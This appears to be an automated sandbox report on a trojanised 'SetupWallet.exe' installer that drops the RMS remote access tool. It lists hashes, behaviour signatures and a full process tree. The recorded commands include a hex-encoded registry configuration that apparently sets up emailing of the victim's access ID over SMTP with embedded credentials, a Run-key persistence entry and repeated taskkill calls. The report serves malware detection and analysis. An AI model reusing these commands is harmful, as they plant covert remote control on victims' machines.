Overview

overview

10

Static

static

SetupWallet.exe

windows7_x64

10

SetupWallet.exe

windows10-2004_x64

10

Analysis

  • max time kernel
    162s
  • max time network
    171s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    17-03-2022 01:28

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    SetupWallet.exe

  • Size

    6.8MB

  • MD5

    5ed4af2f49c3a4766bd4094209a3a030

  • SHA1

    42d0072de6ed12bd605a0362cbe2330c69a93d88

  • SHA256

    65526a403bca2df4dbcbb9997a8d012d6910ffe02342d790e5209eeb339d1027

  • SHA512

    6f238ddb43316e3cc9352caab9103f447938d500db2fa5d074bbdc1d76958306839b6fed352517e9d5d4b861ac14dbb4bdd313c8b94a791b58208d2f328f26fe

Score
10/10
rmspersistencerattrojan

Malware Config

Signatures

  • RMS

    Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.

    trojanratrms
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Executes dropped EXE 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 4 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Drops file in System32 directory 12 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Kills process with taskkill 64 IoCs
    evasion
  • Modifies data under HKEY_USERS 42 IoCs
  • Modifies system certificate store 2 TTPs 10 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\SetupWallet.exe
    "C:\Users\Admin\AppData\Local\Temp\SetupWallet.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2816
    • C:\Users\Admin\AppData\Local\Temp\is-TQESB.tmp\SetupWallet.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-TQESB.tmp\SetupWallet.tmp" /SL5="$50040,6348230,780800,C:\Users\Admin\AppData\Local\Temp\SetupWallet.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:3380
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /C ""C:\ProgramData\Immunity\install.cmd""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5004
        • C:\Windows\system32\reg.exe
          REG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Host" /f /v "notification" /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313130223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b46383041413939302d414432332d343543432d423131352d4439383834443532373335387d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e747275653c2f73656e743e3c76657273696f6e3e36393131303c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e736d74702e79616e6465782e72753c2f686f73743e3c706f72743e3538373c2f706f72743e3c757365726e616d653e736368616b75726f784079616e6465782e72753c2f757365726e616d653e3c70617373776f72643e6f4e33396a3138786771536a33654b5057444744704b76646a6f38384d66536d3c2f70617373776f72643e3c66726f6d5f656d61696c3e736368616b75726f784079616e6465782e72753c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e776577626f6f6c4079616e6465782e72753c2f656d61696c3e3c7375626a6563743e20496e7465726e65742d494420d181d0b3d0b5d0bdd0b5d180d0b8d180d0bed0b2d0b0d0bd3a20254944253c2f7375626a6563743e3c746578743e2671756f743be2968220e2968320e2968420e2968520e29686e298a354686520636f6d7075746572e298a3e2968620e2968520e2968420e2968320e2968220202671756f743b2c2c2671756f743b49443a20254944252671756f743b2c2671756f743b557365726e616d653a2025555345524e414d45252671756f743b2c2671756f743b436f6d7075746572206e616d653a2025434f4d504e414d45252671756f743b2c2671756f743b5468652075736572207761732070726573656e7465642061733a202553454c464944252671756f743b3c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a
          4⤵
            PID:4468
          • C:\Windows\system32\timeout.exe
            TIMEOUT /T 3
            4⤵
            • Delays execution with timeout.exe
            PID:3472
          • C:\ProgramData\Immunity\rutserv.exe
            "C:\ProgramData\Immunity\rutserv.exe"
            4⤵
            • Executes dropped EXE
            • Checks computer location settings
            • Loads dropped DLL
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:4520
            • C:\ProgramData\Immunity\rutserv.exe
              C:\ProgramData\Immunity\rutserv.exe -run_agent -second
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops file in System32 directory
              • Modifies data under HKEY_USERS
              • Modifies system certificate store
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:1916
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 4520 -s 768
              5⤵
              • Program crash
              PID:3060
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:4484
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:4732
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4876
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:360
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1180
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2404
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:3208
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:3680
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:220
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2208
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:5108
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4684
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:844
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:5116
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:816
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:5024
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:3448
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3852
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3564
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3876
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2304
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1836
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3940
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1712
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2124
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2652
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:4344
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1476
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1656
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:744
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:4064
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:3336
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3484
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4088
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:4080
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:3764
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1472
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:3476
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:4140
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3472
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3292
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2068
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4228
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2972
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:368
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2388
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2976
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2544
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:5108
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4836
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4440
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4988
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3948
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:5024
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3448
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:3852
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3564
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im "rundll32.exe"
            4⤵
              PID:3876
            • C:\Windows\system32\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              PID:2304
            • C:\Windows\system32\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
                PID:1836
              • C:\Windows\system32\taskkill.exe
                taskkill /f /im "rundll32.exe"
                4⤵
                • Kills process with taskkill
                PID:2424
              • C:\Windows\system32\taskkill.exe
                taskkill /f /im "rundll32.exe"
                4⤵
                • Kills process with taskkill
                PID:2512
              • C:\Windows\system32\taskkill.exe
                taskkill /f /im "rundll32.exe"
                4⤵
                • Kills process with taskkill
                PID:980
              • C:\Windows\system32\taskkill.exe
                taskkill /f /im "rundll32.exe"
                4⤵
                • Kills process with taskkill
                PID:1104
              • C:\Windows\system32\taskkill.exe
                taskkill /f /im "rundll32.exe"
                4⤵
                • Kills process with taskkill
                PID:3388
              • C:\Windows\system32\taskkill.exe
                taskkill /f /im "rundll32.exe"
                4⤵
                  PID:992
                • C:\Windows\system32\taskkill.exe
                  taskkill /f /im "rundll32.exe"
                  4⤵
                  • Kills process with taskkill
                  PID:3976
                • C:\Windows\system32\taskkill.exe
                  taskkill /f /im "rundll32.exe"
                  4⤵
                  • Kills process with taskkill
                  PID:3104
                • C:\Windows\system32\taskkill.exe
                  taskkill /f /im "rundll32.exe"
                  4⤵
                  • Kills process with taskkill
                  PID:4316
                • C:\Windows\system32\taskkill.exe
                  taskkill /f /im "rundll32.exe"
                  4⤵
                    PID:3528
                  • C:\Windows\system32\taskkill.exe
                    taskkill /f /im "rundll32.exe"
                    4⤵
                    • Kills process with taskkill
                    PID:4208
                  • C:\Windows\system32\taskkill.exe
                    taskkill /f /im "rundll32.exe"
                    4⤵
                    • Kills process with taskkill
                    PID:4084
                  • C:\Windows\system32\taskkill.exe
                    taskkill /f /im "rundll32.exe"
                    4⤵
                    • Kills process with taskkill
                    PID:4412
                  • C:\Windows\system32\taskkill.exe
                    taskkill /f /im "rundll32.exe"
                    4⤵
                    • Kills process with taskkill
                    PID:1472
                  • C:\Windows\system32\taskkill.exe
                    taskkill /f /im "rundll32.exe"
                    4⤵
                    • Kills process with taskkill
                    PID:3464
                  • C:\Windows\system32\taskkill.exe
                    taskkill /f /im "rundll32.exe"
                    4⤵
                    • Kills process with taskkill
                    PID:4856
                  • C:\Windows\system32\taskkill.exe
                    taskkill /f /im "rundll32.exe"
                    4⤵
                    • Kills process with taskkill
                    PID:4864
                  • C:\Windows\system32\taskkill.exe
                    taskkill /f /im "rundll32.exe"
                    4⤵
                    • Kills process with taskkill
                    PID:4896
                  • C:\Windows\system32\taskkill.exe
                    taskkill /f /im "rundll32.exe"
                    4⤵
                    • Kills process with taskkill
                    PID:2940
                  • C:\Windows\system32\taskkill.exe
                    taskkill /f /im "rundll32.exe"
                    4⤵
                      PID:3060
                    • C:\Windows\system32\taskkill.exe
                      taskkill /f /im "rundll32.exe"
                      4⤵
                      • Kills process with taskkill
                      PID:4776
                    • C:\Windows\system32\taskkill.exe
                      taskkill /f /im "rundll32.exe"
                      4⤵
                        PID:2416
                      • C:\Windows\system32\taskkill.exe
                        taskkill /f /im "rundll32.exe"
                        4⤵
                        • Kills process with taskkill
                        PID:1736
                      • C:\Windows\system32\taskkill.exe
                        taskkill /f /im "rundll32.exe"
                        4⤵
                        • Kills process with taskkill
                        PID:3608
                      • C:\Windows\system32\taskkill.exe
                        taskkill /f /im "rundll32.exe"
                        4⤵
                        • Kills process with taskkill
                        PID:3504
                      • C:\Windows\system32\taskkill.exe
                        taskkill /f /im "rundll32.exe"
                        4⤵
                        • Kills process with taskkill
                        PID:2976
                      • C:\Windows\system32\taskkill.exe
                        taskkill /f /im "rundll32.exe"
                        4⤵
                        • Kills process with taskkill
                        PID:2208
                      • C:\Windows\system32\taskkill.exe
                        taskkill /f /im "rundll32.exe"
                        4⤵
                        • Kills process with taskkill
                        PID:4684
                      • C:\Windows\system32\taskkill.exe
                        taskkill /f /im "rundll32.exe"
                        4⤵
                          PID:844
                        • C:\Windows\system32\taskkill.exe
                          taskkill /f /im "rundll32.exe"
                          4⤵
                          • Kills process with taskkill
                          PID:4836
                        • C:\Windows\system32\taskkill.exe
                          taskkill /f /im "rundll32.exe"
                          4⤵
                          • Kills process with taskkill
                          PID:4440
                        • C:\Windows\system32\taskkill.exe
                          taskkill /f /im "rundll32.exe"
                          4⤵
                          • Kills process with taskkill
                          PID:4988
                        • C:\Windows\system32\taskkill.exe
                          taskkill /f /im "rundll32.exe"
                          4⤵
                            PID:3948
                          • C:\Windows\system32\taskkill.exe
                            taskkill /f /im "rundll32.exe"
                            4⤵
                            • Kills process with taskkill
                            PID:5024
                          • C:\Windows\system32\taskkill.exe
                            taskkill /f /im "rundll32.exe"
                            4⤵
                            • Kills process with taskkill
                            PID:1852
                          • C:\Windows\system32\taskkill.exe
                            taskkill /f /im "rundll32.exe"
                            4⤵
                              PID:2028
                            • C:\Windows\system32\taskkill.exe
                              taskkill /f /im "rundll32.exe"
                              4⤵
                              • Kills process with taskkill
                              PID:1052
                            • C:\Windows\system32\taskkill.exe
                              taskkill /f /im "rundll32.exe"
                              4⤵
                              • Kills process with taskkill
                              PID:3876
                            • C:\Windows\system32\taskkill.exe
                              taskkill /f /im "rundll32.exe"
                              4⤵
                              • Kills process with taskkill
                              PID:2304
                            • C:\Windows\system32\taskkill.exe
                              taskkill /f /im "rundll32.exe"
                              4⤵
                              • Kills process with taskkill
                              PID:1836
                            • C:\Windows\system32\reg.exe
                              REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "serv" /t REG_SZ /d "C:\ProgramData\Immunity\rutserv.exe"
                              4⤵
                              • Adds Run key to start application
                              PID:2128
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
                        1⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:1504
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4520 -ip 4520
                        1⤵
                          PID:2628

                        Network

                        MITRE ATT&CK Enterprise v6

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • memory/1916-148-0x0000000001B10000-0x0000000001B11000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/2816-130-0x0000000000400000-0x00000000004CC000-memory.dmp

                          Filesize

                          816KB

                          Download

                        • memory/2816-132-0x0000000000400000-0x00000000004CC000-memory.dmp

                          Filesize

                          816KB

                          Download

                        • memory/3380-134-0x0000000000CA0000-0x0000000000CA1000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/4520-137-0x0000000001850000-0x0000000001851000-memory.dmp

                          Filesize

                          4KB

                          Download